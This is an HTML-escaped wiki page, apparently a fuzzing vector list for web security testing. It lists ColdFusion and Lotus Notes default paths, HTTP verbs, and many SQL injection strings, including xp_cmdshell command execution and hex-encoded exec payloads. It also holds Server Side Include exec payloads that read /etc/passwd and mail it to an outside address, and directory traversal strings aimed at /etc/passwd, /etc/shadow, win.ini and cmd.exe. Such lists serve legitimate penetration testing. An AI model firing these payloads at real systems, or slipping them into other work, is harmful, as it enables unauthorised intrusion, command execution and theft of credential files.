.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2009 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
